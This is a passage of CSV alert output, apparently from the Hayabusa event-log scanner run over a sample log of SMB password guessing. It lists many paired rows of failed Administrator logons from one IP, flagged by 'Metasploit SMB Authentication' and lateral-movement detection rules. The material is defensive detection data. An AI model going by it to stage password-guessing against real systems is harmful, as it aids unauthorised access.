Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 